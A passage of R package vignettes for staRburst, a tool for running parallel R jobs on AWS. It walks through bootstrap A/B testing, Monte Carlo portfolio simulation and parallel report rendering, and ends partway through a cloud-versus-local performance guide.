# 10,000 tiny tasks
results <- future_map(1:10000, small_function)
```

Do:
```{r}
# 100 batches of 100 tasks each
batches <- split(1:10000, ceiling(seq_along(1:10000) / 100))

results <- future_map(batches, function(batch) {
  lapply(batch, small_function)
})

# Flatten results
results <- unlist(results, recursive = FALSE)
```

### 3. Use S3 for Large Data

Don't:
```{r}
big_data <- read.csv("10GB_file.csv")  # Upload for every task
results <- future_map(1:1000, function(i) process(big_data, i))
```

Do:
```{r}
# Upload once to S3
tmp <- tempfile(fileext = ".csv"); write.csv(big_data, tmp, row.names = FALSE)
paws.storage::s3()$put_object(Bucket = "bucket", Key = "big_data.csv", Body = tmp)

# Workers read from S3 (read_s3 helper from "Working with Data" above)
results <- future_map(tasks, function(i) {
  data <- read_s3("s3://bucket/big_data.csv", reader = read.csv)
  process(data, i)
})
```

### 4. Set Reasonable Limits

```{r}
starburst_config(
  max_hourly_cost = 50,            # Cap the hourly rate (USD/hour)
  cost_alert_threshold = 25        # Get warned early
)
```

### 5. Clean Up

```{r}
# staRburst auto-cleans, but you can force it
plan(sequential)  # Switch back to local
# Old cluster resources are cleaned up automatically
```

## Advanced: Custom Configuration

### CPU and Memory

```{r}
# High CPU, low memory (CPU-bound work)
plan(starburst, workers = 50, cpu = 8, memory = "16GB")

# Low CPU, high memory (memory-bound work)
plan(starburst, workers = 25, cpu = 4, memory = "32GB")
```

### Timeout

```{r}
# Increase timeout for long-running tasks (default 1 hour)
plan(starburst, workers = 10, timeout = 7200)  # 2 hours
```

### Region

```{r}
# Use specific region (default from config)
plan(starburst, workers = 50, region = "us-west-2")
```

## Next Steps

- Learn about [Detached Sessions](detached-sessions.html) for long-running jobs
- Explore [Example Vignettes](https://starburst.ing/articles/) for real-world patterns
- Review [Security Best Practices](security.html) guide
- Read [Troubleshooting Guide](troubleshooting.html) when stuck

## Getting Help

- GitHub Issues: https://github.com/scttfrdmn/starburst/issues
- Email: help@starburst.ing
- Documentation: https://starburst.ing

---
title: "Example: Bootstrap Confidence Intervals for A/B Testing"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Bootstrap Confidence Intervals for A/B Testing}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Bootstrap resampling is a powerful statistical technique for estimating confidence intervals without assuming a specific distribution. This example demonstrates parallelizing bootstrap analysis for A/B test results.

**Use Case**: A/B testing, hypothesis testing, statistical inference, conversion rate analysis

**Computational Pattern**: Embarrassingly parallel resampling with aggregation

## The Problem

You've run an A/B test on your website with two variants:
- **Variant A (Control)**: 10,000 visitors, 850 conversions (8.5% conversion rate)
- **Variant B (Treatment)**: 10,000 visitors, 920 conversions (9.2% conversion rate)

You need to:
1. Estimate the confidence interval for the difference in conversion rates
2. Calculate the probability that B is better than A
3. Determine if the result is statistically significant

Traditional parametric tests assume normal distributions. Bootstrap resampling makes no such assumptions and provides more robust estimates.

## Setup

```{r setup, eval=FALSE}
library(starburst)
```

## Generate Sample Data

Create synthetic A/B test data:

```{r data, eval=FALSE}
set.seed(42)

# Variant A (control)
n_a <- 10000
conversions_a <- 850
variant_a <- c(rep(1, conversions_a), rep(0, n_a - conversions_a))

# Variant B (treatment)
n_b <- 10000
conversions_b <- 920
variant_b <- c(rep(1, conversions_b), rep(0, n_b - conversions_b))

# Observed difference
observed_diff <- mean(variant_b) - mean(variant_a)
cat(sprintf("Observed conversion rates:\n"))
cat(sprintf("  Variant A: %.2f%%\n", mean(variant_a) * 100))
cat(sprintf("  Variant B: %.2f%%\n", mean(variant_b) * 100))
cat(sprintf("  Difference: %.2f%% (%.1f%% relative lift)\n",
            observed_diff * 100,
            (observed_diff / mean(variant_a)) * 100))
```

**Output**:
```
Observed conversion rates:
  Variant A: 8.50%
  Variant B: 9.20%
  Difference: 0.70% (8.2% relative lift)
```

## Bootstrap Function

Define a function that performs one bootstrap iteration:

```{r bootstrap-fn, eval=FALSE}
bootstrap_iteration <- function(iter, data_a, data_b) {
  # Resample with replacement
  n_a <- length(data_a)
  n_b <- length(data_b)

  sample_a <- sample(data_a, n_a, replace = TRUE)
  sample_b <- sample(data_b, n_b, replace = TRUE)

  # Calculate metrics
  rate_a <- mean(sample_a)
  rate_b <- mean(sample_b)
  diff <- rate_b - rate_a
  relative_lift <- diff / rate_a

  list(
    iteration = iter,
    rate_a = rate_a,
    rate_b = rate_b,
    diff = diff,
    relative_lift = relative_lift,
    b_wins = diff > 0
  )
}
```

## Local Execution

Run a smaller bootstrap locally:

```{r local, eval=FALSE}
n_bootstrap_local <- 1000

cat(sprintf("Running %d bootstrap iterations locally...\n", n_bootstrap_local))
local_start <- Sys.time()

local_results <- lapply(
  1:n_bootstrap_local,
  bootstrap_iteration,
  data_a = variant_a,
  data_b = variant_b
)

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
cat(sprintf("[OK] Completed in %.2f seconds\n\n", local_time))
```

**Illustrative output**:
```
Running 1000 bootstrap iterations locally...
[OK] Completed in 2.1 seconds
```

## Cloud Execution with staRburst

Run 10,000 bootstrap iterations on AWS:

```{r cloud, eval=FALSE}
n_bootstrap <- 10000

cat(sprintf("Running %d bootstrap iterations on AWS...\n", n_bootstrap))

results <- starburst_map(
  1:n_bootstrap,
  bootstrap_iteration,
  data_a = variant_a,
  data_b = variant_b,
  workers = 25,
  cpu = 1,
  memory = "2GB"
)
```

**Illustrative output**:
```
[Starting] Starting starburst cluster with 25 workers
[Status] Processing 10000 items with 25 workers
[Starting] Submitting 10000 tasks...
[Wait] Progress: 10000/10000 (18.0s)
[OK] Completed in 18.0 seconds
[Cost] Estimated cost: $0.01
```

## Results Analysis

Extract and analyze the bootstrap distribution:

```{r analysis, eval=FALSE}
# Extract metrics
diffs <- sapply(results, function(x) x$diff)
relative_lifts <- sapply(results, function(x) x$relative_lift)
b_wins <- sapply(results, function(x) x$b_wins)

# Calculate confidence intervals
ci_95 <- quantile(diffs, c(0.025, 0.975))
ci_99 <- quantile(diffs, c(0.005, 0.995))

# Probability that B is better than A
prob_b_wins <- mean(b_wins) * 100

# Print results
cat("\n=== Bootstrap Results (10,000 iterations) ===\n\n")
cat(sprintf("Observed difference: %.2f%%\n", observed_diff * 100))
cat(sprintf("\n95%% Confidence Interval: [%.2f%%, %.2f%%]\n",
            ci_95[1] * 100, ci_95[2] * 100))
cat(sprintf("99%% Confidence Interval: [%.2f%%, %.2f%%]\n",
            ci_99[1] * 100, ci_99[2] * 100))
cat(sprintf("\nProbability that B > A: %.1f%%\n", prob_b_wins))

# Statistical significance
if (ci_95[1] > 0) {
  cat("\n[OK] Result is statistically significant at 95% confidence level\n")
  cat("  (95% CI does not include zero)\n")
} else {
  cat("\n[X] Result is NOT statistically significant at 95% confidence level\n")
  cat("  (95% CI includes zero)\n")
}

# Relative lift analysis
cat(sprintf("\nRelative lift: %.1f%%\n",
            median(relative_lifts) * 100))
cat(sprintf("95%% CI for relative lift: [%.1f%%, %.1f%%]\n",
            quantile(relative_lifts, 0.025) * 100,
            quantile(relative_lifts, 0.975) * 100))
```

**Illustrative output**:
```
=== Bootstrap Results (10,000 iterations) ===

Observed difference: 0.70%

95% Confidence Interval: [0.21%, 1.19%]
99% Confidence Interval: [0.08%, 1.32%]

Probability that B > A: 99.7%

[OK] Result is statistically significant at 95% confidence level
  (95% CI does not include zero)

Relative lift: 8.2%
95% CI for relative lift: [2.5%, 14.0%]
```

## Visualization

Plot the bootstrap distribution:

```{r viz, eval=FALSE}
# Create histogram
hist(diffs * 100,
     breaks = 50,
     main = "Bootstrap Distribution of Conversion Rate Difference",
     xlab = "Difference in Conversion Rate (percentage points)",
     col = "lightblue",
     border = "white")

# Add reference lines
abline(v = 0, col = "red", lwd = 2, lty = 2)
abline(v = ci_95 * 100, col = "darkblue", lwd = 2, lty = 2)
abline(v = observed_diff * 100, col = "darkgreen", lwd = 2)

# Add legend
legend("topright",
       c("Observed difference", "Zero (no effect)", "95% CI"),
       col = c("darkgreen", "red", "darkblue"),
       lwd = 2,
       lty = c(1, 2, 2))
```

## Performance Comparison

| Method | Iterations | Compute time | Cost |
|--------|-----------|------|------|
| Local | 1,000 | 2.1 sec | $0 |
| Local (est.) | 10,000 | 21 sec | $0 |
| staRburst | 10,000 | 18 sec (compute only) | $0.01 |

> **Reading these numbers honestly:** the staRburst row is *compute time only* on a
> warm pool and excludes the one-time startup (~2 minutes) and image pull. For a job
> that finishes in ~20 seconds locally, that startup makes local the faster choice —
> the numbers here are illustrative, not a claim that bursting a 20-second job wins.
> Bootstrap *does* parallelize well; the payoff is real once iterations are expensive
> or you scale to 100,000+. See `vignette("performance")` for the sizing heuristics.

**Key Insights**:
- Bootstrap is highly parallelizable
- Minimal per-task cost even with 10,000 iterations
- The win comes at scale (100,000+ iterations or expensive per-iteration work),
  where startup overhead is amortized away

## Advanced: Multi-Metric Bootstrap

Bootstrap multiple metrics simultaneously:

```{r multi-metric, eval=FALSE}
bootstrap_all_metrics <- function(iter, data_a, data_b) {
  n_a <- length(data_a)
  n_b <- length(data_b)

  sample_a <- sample(data_a, n_a, replace = TRUE)
  sample_b <- sample(data_b, n_b, replace = TRUE)

  # Multiple metrics
  rate_a <- mean(sample_a)
  rate_b <- mean(sample_b)
  se_a <- sd(sample_a) / sqrt(n_a)
  se_b <- sd(sample_b) / sqrt(n_b)

  list(
    diff_rate = rate_b - rate_a,
    relative_lift = (rate_b - rate_a) / rate_a,
    z_score = (rate_b - rate_a) / sqrt(se_a^2 + se_b^2),
    effect_size = (rate_b - rate_a) / sqrt((var(sample_a) + var(sample_b)) / 2)
  )
}

# Run multi-metric bootstrap
multi_results <- starburst_map(
  1:10000,
  bootstrap_all_metrics,
  data_a = variant_a,
  data_b = variant_b,
  workers = 25
)
```

## When to Use This Pattern

**Good fit**:
- Need robust confidence intervals
- Non-normal distributions
- Small sample sizes
- Complex metrics (e.g., ratios, quantiles)
- Multiple hypothesis testing

**Not ideal**:
- Very large datasets (> 1M rows per group)
- Simple metrics with known distributions
- Real-time analysis requirements

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/bootstrap.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/bootstrap.R", package = "starburst"))
```

## Next Steps

- Try different sample sizes
- Experiment with stratified bootstrap
- Compare with parametric tests (t-test, z-test)
- Add multiple variants (A/B/C testing)
- Bootstrap other metrics (median, quantiles, variance)

**Related examples**:
- [Monte Carlo Simulation](example-monte-carlo.html) - Similar resampling pattern
- [Risk Modeling](example-risk-modeling.html) - Advanced statistical analysis

---
title: "Example: Monte Carlo Portfolio Simulation"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Monte Carlo Portfolio Simulation}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Monte Carlo simulations are a common use case for parallel computing. This example demonstrates running 10,000 portfolio simulations to estimate risk metrics.

**Use Case**: Portfolio risk analysis, Value at Risk (VaR) calculations, stress testing

**Computational Pattern**: Embarrassingly parallel - each simulation is independent

## The Problem

You need to simulate 10,000 different portfolio scenarios to estimate:
- Expected portfolio value
- Value at Risk (VaR) at 95% confidence
- Sharpe ratio distribution
- Probability of loss scenarios

Each simulation involves 252 trading days (one year) with correlated asset returns.

## Setup

```{r setup, eval=FALSE}
library(starburst)
library(ggplot2)
```

## Simulation Function

Define a function that simulates one portfolio trajectory:

```{r simulation, eval=FALSE}
simulate_portfolio <- function(seed) {
  set.seed(seed)

  # Portfolio parameters
  n_days <- 252
  initial_value <- 1000000  # $1M portfolio

  # Asset allocation (60/40 stocks/bonds)
  stock_weight <- 0.6
  bond_weight <- 0.4

  # Expected returns (annualized)
  stock_return <- 0.10 / 252  # 10% annual
  bond_return <- 0.04 / 252   # 4% annual

  # Volatility (annualized)
  stock_vol <- 0.20 / sqrt(252)  # 20% annual
  bond_vol <- 0.05 / sqrt(252)   # 5% annual

  # Correlation
  correlation <- 0.3

  # Generate correlated returns
  stock_returns <- rnorm(n_days, mean = stock_return, sd = stock_vol)
  bond_noise <- rnorm(n_days)
  bond_returns <- rnorm(n_days, mean = bond_return, sd = bond_vol)
  bond_returns <- correlation * stock_returns +
                  sqrt(1 - correlation^2) * bond_returns

  # Portfolio returns
  portfolio_returns <- stock_weight * stock_returns +
                      bond_weight * bond_returns

  # Cumulative value
  portfolio_values <- initial_value * cumprod(1 + portfolio_returns)

  # Calculate metrics
  final_value <- portfolio_values[n_days]
  max_drawdown <- max((cummax(portfolio_values) - portfolio_values) /
                      cummax(portfolio_values))
  sharpe_ratio <- mean(portfolio_returns) / sd(portfolio_returns) * sqrt(252)

  list(
    final_value = final_value,
    return_pct = (final_value - initial_value) / initial_value * 100,
    max_drawdown = max_drawdown,
    sharpe_ratio = sharpe_ratio,
    min_value = min(portfolio_values),
    max_value = max(portfolio_values)
  )
}
```

## Local Execution

Run a smaller test locally:

```{r local, eval=FALSE}
# Test with 100 simulations
set.seed(123)
local_start <- Sys.time()
local_results <- lapply(1:100, simulate_portfolio)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("100 simulations completed in %.1f seconds\n", local_time))
cat(sprintf("Estimated time for 10,000: %.1f minutes\n",
            local_time * 100 / 60))
```

**Illustrative output** (depends on your machine):
```
100 simulations completed in ~2 seconds
Estimated time for 10,000: ~a few minutes
```

## Cloud Execution with staRburst

Each simulation is tiny (well under a millisecond), so this is a **batch-it**
workload: submitting 10,000 one-simulation tasks would be dominated by per-task S3
overhead (see the [Workload Shapes](https://starburst.ing/articles/workload-shapes.html)
guide, which measures that anti-pattern at ~77 minutes). Instead, batch into ~100
tasks of 100 simulations each:

```{r cloud, eval=FALSE}
# 100 tasks x 100 simulations = 10,000 simulations, batched
batches <- split(1:10000, ceiling(seq_along(1:10000) / 100))
results <- starburst_map(
  batches,
  function(seeds) lapply(seeds, simulate_portfolio),
  workers = 50,
  cpu = 2,
  memory = "4GB"
)
results <- unlist(results, recursive = FALSE)  # flatten to 10,000 results
```

**Illustrative output** (times/cost vary — see the Workload Shapes and Performance
guides for measured numbers):
```
[Starting] Starting starburst cluster with 50 workers
[Status] Processing 100 items with 50 workers
[Starting] Submitting 100 tasks...
[Wait] Progress: 100/100
[OK] Completed
[Cost] Estimated cost: (printed per run)
```

## Results Analysis

Extract and analyze the results:

```{r analysis, eval=FALSE}
# Extract metrics
final_values <- sapply(results, function(x) x$final_value)
returns <- sapply(results, function(x) x$return_pct)
sharpe_ratios <- sapply(results, function(x) x$sharpe_ratio)
max_drawdowns <- sapply(results, function(x) x$max_drawdown)

# Summary statistics
cat("\n=== Portfolio Simulation Results (10,000 scenarios) ===\n")
cat(sprintf("Mean final value: $%.0f\n", mean(final_values)))
cat(sprintf("Median final value: $%.0f\n", median(final_values)))
cat(sprintf("\nMean return: %.2f%%\n", mean(returns)))
cat(sprintf("Std dev of returns: %.2f%%\n", sd(returns)))
cat(sprintf("\nValue at Risk (5%%): $%.0f\n",
            quantile(final_values, 0.05)))
cat(sprintf("Expected Shortfall (5%%): $%.0f\n",
            mean(final_values[final_values <= quantile(final_values, 0.05)])))
cat(sprintf("\nMean Sharpe Ratio: %.2f\n", mean(sharpe_ratios)))
cat(sprintf("Mean Max Drawdown: %.2f%%\n", mean(max_drawdowns) * 100))
cat(sprintf("\nProbability of loss: %.2f%%\n",
            mean(returns < 0) * 100))

# Distribution plot
hist(final_values / 1000,
     breaks = 50,
     main = "Distribution of Portfolio Final Values",
     xlab = "Final Value ($1000s)",
     col = "lightblue",
     border = "white")
abline(v = 1000, col = "red", lwd = 2, lty = 2)
abline(v = quantile(final_values / 1000, 0.05), col = "orange", lwd = 2, lty = 2)
legend("topright",
       c("Initial Value", "VaR (5%)"),
       col = c("red", "orange"),
       lwd = 2, lty = 2)
```

**Illustrative output** (values depend on the random draws):
```
=== Portfolio Simulation Results (10,000 scenarios) ===
Mean final value: $1,102,450
Median final value: $1,097,230
Mean return: 10.24%   Std dev: 12.83%
Value at Risk (5%): $892,340
Probability of loss: 18.34%
```

## Performance

Monte Carlo of tiny per-simulation tasks is a **batching** story, not a
raw-fan-out story: batch to ~100 tasks (as above) and the run is dominated by real
compute rather than per-task overhead. For **measured** cold/warm numbers — including
how batching turns a ~77-minute naive run into minutes, and how to pick worker
counts — see the
[Workload Shapes](https://starburst.ing/articles/workload-shapes.html) and
[Performance](https://starburst.ing/articles/performance.html) guides. We don't
repeat hand-written speedup tables here; those guides are the single source of truth.

## When to Use This Pattern

**Good fit**:
- Each iteration is independent
- Computational time > 0.1 seconds per iteration
- Total iterations > 1,000
- Results can be easily aggregated

**Not ideal**:
- Very fast iterations (< 0.01 seconds)
- High data transfer per iteration
- Strong sequential dependencies

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/monte-carlo.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/monte-carlo.R", package = "starburst"))
```

## Next Steps

- Try adjusting portfolio parameters (allocation, volatility)
- Experiment with different worker counts
- Compare costs for different AWS regions
- Add more sophisticated portfolio models

**Related examples**:
- [Bootstrap Confidence Intervals](example-bootstrap.html) - Another Monte Carlo application
- [Financial Risk Modeling](example-risk-modeling.html) - Advanced portfolio analysis

---
title: "Example: Parallel Report Generation"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Parallel Report Generation}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Generating personalized reports for many customers is a common bottleneck. This example demonstrates parallelizing RMarkdown/Quarto report generation using staRburst.

**Use Case**: Monthly customer reports, automated analytics, personalized dashboards, regulatory reporting

**Computational Pattern**: I/O-bound parallel processing with document rendering

## The Problem

You need to generate 50 customized monthly reports for different customers:
- Each report includes data analysis, visualizations, and summary statistics
- Each report takes 1-2 minutes to render
- Sequential generation would take 50-100 minutes
- Reports must be delivered by end of business day

## Setup

```{r setup, eval=FALSE}
library(starburst)
library(rmarkdown)
```

## Report Template

Create a simple RMarkdown template:

```{r template, eval=FALSE}
# Create report template
report_template <- '
---
title: "Monthly Analytics Report"
output: html_document
params:
  customer_id: ""
  customer_name: ""
  month: ""
  data: NULL
---

`​``{r template-setup, include=FALSE}
knitr::opts_chunk$set(echo = FALSE, warning = FALSE, message = FALSE)
`​``

# Monthly Report for `r params$customer_name`

**Customer ID:** `r params$customer_id`
**Period:** `r params$month`
**Report Generated:** `r format(Sys.time(), "%Y-%m-%d %H:%M")`

---

## Executive Summary

This report summarizes activity for `r params$customer_name` during `r params$month`.

\`\`\`{r summary}
data <- params$data
cat(sprintf("Total transactions: %d\\n", nrow(data)))
cat(sprintf("Total revenue: $%.2f\\n", sum(data$revenue)))
cat(sprintf("Average order value: $%.2f\\n", mean(data$revenue)))
cat(sprintf("Active days: %d\\n", length(unique(data$date))))
\`\`\`

## Revenue Trend

\`\`\`{r revenue-plot, fig.width=8, fig.height=4}
daily_revenue <- aggregate(revenue ~ date, data, sum)
plot(daily_revenue$date, daily_revenue$revenue,
     type = "l", lwd = 2, col = "steelblue",
     main = "Daily Revenue Trend",
     xlab = "Date", ylab = "Revenue ($)")
grid()
\`\`\`

## Top Products

\`\`\`{r top-products}
top_products <- head(
  aggregate(revenue ~ product, data, sum),
  10
)
top_products <- top_products[order(-top_products$revenue), ]
knitr::kable(top_products, format.args = list(big.mark = ","))
\`\`\`

## Summary Statistics

\`\`\`{r stats}
stats <- data.frame(
  Metric = c("Total Orders", "Avg Order Value", "Max Order",
             "Min Order", "Std Dev"),
  Value = c(
    nrow(data),
    round(mean(data$revenue), 2),
    round(max(data$revenue), 2),
    round(min(data$revenue), 2),
    round(sd(data$revenue), 2)
  )
)
knitr::kable(stats, format.args = list(big.mark = ","))
\`\`\`

---

*This report was automatically generated using staRburst parallel processing.*
'

# Save template to file
writeLines(report_template, "report_template.Rmd")
```

## Generate Sample Data

Create synthetic customer data:

```{r data, eval=FALSE}
# Function to generate data for one customer
generate_customer_data <- function(customer_id) {
  set.seed(customer_id)

  n_transactions <- sample(100:500, 1)
  dates <- sort(sample(seq.Date(
    from = as.Date("2026-01-01"),
    to = as.Date("2026-01-31"),
    by = "day"
  ), n_transactions, replace = TRUE))

  products <- c("Product A", "Product B", "Product C",
                "Product D", "Product E")

  data.frame(
    customer_id = customer_id,
    date = dates,
    product = sample(products, n_transactions, replace = TRUE),
    revenue = round(rnorm(n_transactions, mean = 150, sd = 50), 2),
    stringsAsFactors = FALSE
  )
}

# Generate customer list
n_customers <- 50
customers <- data.frame(
  customer_id = sprintf("CUST%03d", 1:n_customers),
  customer_name = paste("Company", LETTERS[1:n_customers %% 26 + 1],
                       (1:n_customers %/% 26) + 1),
  stringsAsFactors = FALSE
)

head(customers)
```

## Report Generation Function

Define function to generate one report:

```{r render-fn, eval=FALSE}
generate_report <- function(customer_info) {
  customer_id <- customer_info$customer_id
  customer_name <- customer_info$customer_name

  # Generate data for this customer
  data <- generate_customer_data(as.numeric(gsub("CUST", "", customer_id)))

  # Output file path
  output_file <- sprintf("report_%s.html", customer_id)

  tryCatch({
    # Render report
    rmarkdown::render(
      input = "report_template.Rmd",
      output_file = output_file,
      params = list(
        customer_id = customer_id,
        customer_name = customer_name,
        month = "January 2026",
        data = data
      ),
      quiet = TRUE
    )

    list(
      customer_id = customer_id,
      success = TRUE,
      output_file = output_file,
      file_size = file.size(output_file),
      render_time = Sys.time()
    )
  }, error = function(e) {
    list(
      customer_id = customer_id,
      success = FALSE,
      error = as.character(e),
      render_time = Sys.time()
    )
  })
}
```

## Local Execution

Test with a few reports locally:

```{r local, eval=FALSE}
# Test with 5 reports
test_customers <- head(customers, 5)

cat(sprintf("Rendering %d reports locally...\n", nrow(test_customers)))
local_start <- Sys.time()

local_results <- lapply(
  split(test_customers, 1:nrow(test_customers)),
  generate_report
)

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("[OK] Completed in %.1f seconds\n", local_time))
cat(sprintf("  Average: %.1f seconds per report\n", local_time / 5))
cat(sprintf("  Estimated time for %d reports: %.1f minutes\n\n",
            n_customers, (local_time / 5 * n_customers) / 60))
```

**Illustrative output**:
```
Rendering 5 reports locally...
[OK] Completed in 23.4 seconds
  Average: 4.7 seconds per report
  Estimated time for 50 reports: 3.9 minutes
```

## Cloud Execution with staRburst

Render all reports in parallel:

```{r cloud, eval=FALSE}
cat(sprintf("Rendering %d reports on AWS...\n", n_customers))

# Convert data frame rows to list for starburst_map
customer_list <- split(customers, 1:nrow(customers))

results <- starburst_map(
  customer_list,
  generate_report,
  workers = 25,
  cpu = 2,
  memory = "4GB"
)
```

**Illustrative output**:
```
[Starting] Starting starburst cluster with 25 workers
[Status] Processing 50 items with 25 workers
[Starting] Submitting 50 tasks...
[Wait] Progress: 50/50 (24.0s)
[OK] Completed in 24.0 seconds
[Cost] Estimated cost: $0.01
```

## Results Processing

Analyze the generation results:

```{r results, eval=FALSE}
# Check success rate
success_count <- sum(sapply(results, function(x) x$success))
failure_count <- sum(!sapply(results, function(x) x$success))

cat("\n=== Report Generation Summary ===\n\n")
cat(sprintf("Total reports: %d\n", length(results)))
cat(sprintf("Successfully generated: %d (%.1f%%)\n",
            success_count, (success_count / length(results)) * 100))
cat(sprintf("Failed: %d\n\n", failure_count))

# File size summary
successful_results <- results[sapply(results, function(x) x$success)]
file_sizes <- sapply(successful_results, function(x) x$file_size)

cat("File size statistics:\n")
cat(sprintf("  Total size: %.2f MB\n", sum(file_sizes) / 1024^2))
cat(sprintf("  Average size: %.1f KB\n", mean(file_sizes) / 1024))
cat(sprintf("  Range: %.1f - %.1f KB\n\n",
            min(file_sizes) / 1024, max(file_sizes) / 1024))

# Show sample of generated reports
cat("Generated reports:\n")
report_files <- sapply(successful_results[1:10], function(x) x$output_file)
print(report_files)
```

**Illustrative output**:
```
=== Report Generation Summary ===

Total reports: 50
Successfully generated: 50 (100.0%)
Failed: 0

File size statistics:
  Total size: 2.45 MB
  Average size: 50.2 KB
  Range: 45.3 - 55.8 KB

Generated reports:
 [1] "report_CUST001.html" "report_CUST002.html"
 [3] "report_CUST003.html" "report_CUST004.html"
 [5] "report_CUST005.html" "report_CUST006.html"
 [7] "report_CUST007.html" "report_CUST008.html"
 [9] "report_CUST009.html" "report_CUST010.html"
```

## Performance

Report generation is a **genuine fit** for bursting: each report takes ~1–2 minutes
to render, so with dozens-to-hundreds of them the per-task work dwarfs the one-time
startup — exactly the shape that wins (unlike the seconds-scale demos). One report
per task is the right granularity here (no batching needed).

We don't hand-write speedup tables in the examples. For **measured** numbers — a
workload where the cloud wins, one where it loses, and how to size workers — see
`vignette("performance")` and `vignette("workload-shapes")`, and regenerate figures
for your own workload with `bench/benchmark.R`.

## Advanced: Custom Report Distribution

Automatically distribute reports after generation:

```{r distribution, eval=FALSE}
generate_and_distribute <- function(customer_info) {
  # Generate report
  result <- generate_report(customer_info)

  if (result$success) {
    # Upload to S3 (example)
    tryCatch({
      # paws::s3()$put_object(
      #   Bucket = "my-reports-bucket",
      #   Key = sprintf("reports/2026-01/%s", result$output_file),
      #   Body = readBin(result$output_file, "raw",
      #                  file.size(result$output_file))
      # )

      result$uploaded <- TRUE
      result$s3_url <- sprintf("s3://my-reports-bucket/reports/2026-01/%s",
                              result$output_file)
    }, error = function(e) {
      result$uploaded <- FALSE
      result$upload_error <- as.character(e)
    })
  }

  result
}
```

## When to Use This Pattern

**Good fit**:
- Many independent reports (> 10)
- Report rendering takes > 30 seconds
- Time-sensitive delivery requirements
- CPU or I/O intensive rendering

**Not ideal**:
- Very simple reports (< 10 seconds to render)
- Reports with shared state or dependencies
- Interactive report generation
- Real-time reporting

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/reports.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/reports.R", package = "starburst"))
```

## Next Steps

- Use real customer data from database
- Add more complex visualizations
- Implement automated email distribution
- Create PDF reports instead of HTML
- Add report templating system
- Schedule monthly report generation

**Related examples**:
- [API Calls](example-api-calls.html) - Another I/O-bound parallel task
- [Feature Engineering](example-feature-engineering.html) - Data processing patterns

---
title: "Performance Guide: When to Use Cloud vs Local"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Performance Guide: When to Use Cloud vs Local}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r setup, include=FALSE}
knitr::opts_chunk$set(eval = FALSE)
```

## The Honest Truth

Cloud is not magic. It has overhead, costs money, and AWS CPUs are slower per-core than a modern laptop like an M4 Pro. But with the right instance types and spot pricing, cloud can be both faster and cheaper than you expect.

**Cloud wins when:**

- Total workload > 2–4 hours sequential
- You run the same analysis multiple times (parameter sweeps, recurring jobs)
- You need results faster than local parallel can deliver
- Your laptop needs to stay usable
- Budget allows $1–5 per job (often less with spot instances)

**Local wins when:**

- Workload < 1 hour
- One-time quick analysis
- You have a powerful multi-core machine (16+ cores)
- Data is too sensitive for cloud
- Zero budget

---

## Real Performance Data

These are **real measured runs** from `bench/benchmark.R` (see `bench/README.md`) on
live AWS — full cold starts, nothing excluded. They're chosen to show *both* sides, so
you can calibrate when bursting is worth it. Same setup for both: staRburst 0.3.9,
us-east-1, EC2 `c7i.xlarge` Spot, cold start, sequential baseline on an Apple M4 Pro
(Mac16,11; 12 cores = 8 performance + 4 efficiency, 48 GB, macOS 26.5.2, R 4.6.1),
2026-07-21.

### ✅ When it pays off — heavy per-task work

30 tasks, each ~10 s of dense linear algebra (repeated SVD):

| Phase | Time |
|-------|------|
| Local (sequential, 1 pass over 30 tasks) | 319.3 s (5.3 min) |
| Cloud: startup (provision + image pull) | 87.5 s |
| Cloud: compute + collect (30 workers) | 38.4 s |
| **Cloud total (cold)** | **125.8 s (2.1 min)** |
| Est. cost | $0.06 |

**~2.5× faster even counting the full ~90 s cold startup** — because the 30 tasks
finish in parallel in ~38 s instead of ~5 min sequentially. Run this as a warm pool or
a parameter sweep and the startup amortizes away, pushing the speedup higher.

### ❌ When it doesn't — light per-task work

20 tasks, each a fraction of a second (small terrain-stat grids):

| Phase | Time |
|-------|------|
| Local (sequential) | 0.1 s |
| Cloud: startup | 74.7 s |
| Cloud: compute + collect | 27.9 s |
| **Cloud total (cold)** | **102.6 s** |
| Est. cost | $0.03 |

**~1000× *slower* than local.** The work is trivial, so the fixed startup is pure
overhead with nothing to amortize it against. Running this locally is the right call.

### The lesson

Same tool, same 20–30 workers, opposite verdicts. The only thing that changed is
**how much work each task does**. If your tasks are seconds-to-minutes each and you
have many of them, staRburst wins; if they're sub-second, stay local. The rest of this
guide makes that boundary precise.

---

## Per-Task Overhead

Once workers are running, each task incurs a small fixed overhead from S3 data transfer:

| Task Duration | Overhead % | Efficiency |
|--------------|------------|------------|
| 1 second     | 200–300%   | Negative   |
| 10 seconds   | 20–30%     | Moderate   |
| 30 seconds   | 7–10%      | Good       |
| 60 seconds   | 3–5%       | Excellent  |
| 5 minutes    | <1%        | Optimal    |

**Sweet spot**: tasks that run for 2–10 minutes each. For faster tasks, batch them.

---

## Batching

The most important optimization. Instead of sending 10,000 tiny tasks, group them:

```{r batching-bad}
# Bad: 10,000 tasks of 0.1s each — overhead dominates
starburst_map(1:10000, quick_fn, workers = 100)
```

```{r batching-good}
# Good: 100 tasks of 100s each — overhead is negligible
